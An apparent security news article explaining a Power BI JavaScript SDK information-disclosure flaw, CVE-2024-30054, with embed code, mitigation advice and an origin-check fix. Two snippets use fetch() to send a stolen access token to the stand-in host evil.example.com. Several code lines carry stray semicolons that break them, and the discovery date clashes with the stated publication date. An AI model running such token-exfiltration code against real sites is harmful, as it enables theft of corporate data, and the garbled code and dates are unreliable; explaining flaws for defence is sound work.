CVE CyberSecurity Database News

CVE-2024-30054 - Microsoft Power BI Client JavaScript SDK Information Disclosure Exploit

Poster -

In June 2024, security researchers discovered a significant vulnerability tracked as CVE-2024-30054 within the Microsoft Power BI Client JavaScript SDK. This security flaw poses a risk to data confidentiality as it allows attackers to retrieve sensitive information that should not be accessible to unauthorized users. In this long read, we'll break down the vulnerability in simple language, walk you through the impact, share technical details, offer code snippets for understanding or testing, and give you all the links to original references.

What is Microsoft Power BI Client JavaScript SDK?

Microsoft Power BI is a powerful platform for business analytics and data visualization. Many apps use the Power BI JavaScript SDK to embed reports and dashboards into their own web applications. The SDK helps interact with Power BI services right from web browsers, but, as with any browser code, security is crucial.

Vulnerability Summary

CVE-2024-30054 results from improper handling of sensitive tokens and confidential information within the Power BI JavaScript SDK. A specially crafted script on an attacker’s website or a malicious insider could access reports, dashboards, or even authentication tokens without proper validation or user consent. If exploited, it could lead to sensitive corporate data leakage.

Exploit Details

This vulnerability is due to insecure JavaScript object exposure and poor cross-origin checks. Let's break it down with an example.

How It Works

1. The vulnerable SDK exposes internal report configuration (including access tokens and dataset IDs) via the window object or by weak cross-origin messaging.
2. Malicious JavaScript (either on the same domain or via XSS in the embedding site) can access these details and exfiltrate them.
3. Attackers can then use these tokens to access Power BI resources directly, bypassing organizational controls.

Assuming a webpage embeds a Power BI report using the SDK like this

<!-- Example HTML for embedding Power BI report -->
<div id="reportContainer"></div>
<script src="https://cdn.jsdelivr.net/npm/powerbi-client/dist/powerbi.js"></script>;
<script>
    var embedConfig = {
        type: 'report',
        id: 'YOUR_REPORT_ID',
        embedUrl: 'https://app.powerbi.com/reportEmbed?reportId=YOUR_REPORT_ID';,
        accessToken: 'YOUR_ACCESS_TOKEN',
        tokenType: window['powerbi'].models.TokenType.Embed
    };

    var reportContainer = document.getElementById('reportContainer');
    var report = powerbi.embed(reportContainer, embedConfig);
</script>

Vulnerable Pattern:
The object embedConfig (including sensitive accessToken) remains accessible in the DOM context. An attacker with XSS, or in rare misconfigured CORS situations, can grab and leak the token.

If an attacker can insert code, they can do

// Exfiltrate Power BI access token
var stolenToken = window.embedConfig?.accessToken || 'not found';
// Send the token to attackers' server
fetch('https://evil.example.com/steal?token='; + encodeURIComponent(stolenToken));

Cross-Origin Messaging Exploit

The Power BI SDK allows postMessage communication for events. However, the vulnerability allowed receiving messages from any origin, like so:

window.addEventListener("message", function(event) {
    // Incorrect origin check!
    if (event.data && event.data.accessToken) {
        fetch('https://evil.example.com/steal?token='; + encodeURIComponent(event.data.accessToken));
    }
});

*These are simplified demonstrations for educational purposes only.*

Impact

- Sensitive Data Exposure: Attackers get access to valid Power BI access tokens or IDs, gaining broader access to reports or datasets.

Confidential Document Leak: Attackers may download financial, medical, or other regulated data.

- Compliance Violation: Leaked info could breach GDPR, HIPAA, or similar standards if PII is involved.

Apply Principle of Least Privilege: Only expose tokens and resources truly needed client-side.

- Enhance Input Validation: Sanitize all data and prevent XSS vulnerabilities within your app embedding Power BI.
- Secure postMessage Handling: Always validate source domains/origin.

Secure Message Validation Example

window.addEventListener("message", function(event) {
    // Only accept messages from Power BI's official domain
    if (event.origin === "https://app.powerbi.com";) {
        // handle message
    }
});

References

- Microsoft Security Guide for CVE-2024-30054
- powerbi-client NPM changelog
- Power BI JavaScript SDK embedding guide
- Microsoft Security Response Center

Conclusion

CVE-2024-30054 is a stark reminder of the risks inherent to client-side SDKs, especially when dealing with sensitive data. Don't wait: update your Power BI JavaScript SDK, audit your embed scripts, and make sure your site is safe from cross-origin and XSS exploits. Keeping your software up-to-date is the quickest way to avoid becoming the next breach headline!

Note:

This post contains simplified exploit code for awareness and defensive education only. Never use these techniques on systems you do not own or have permission to test.

Timeline

Published on: 05/14/2024 17:17:22 UTC
Last modified on: 06/19/2024 20:58:51 UTC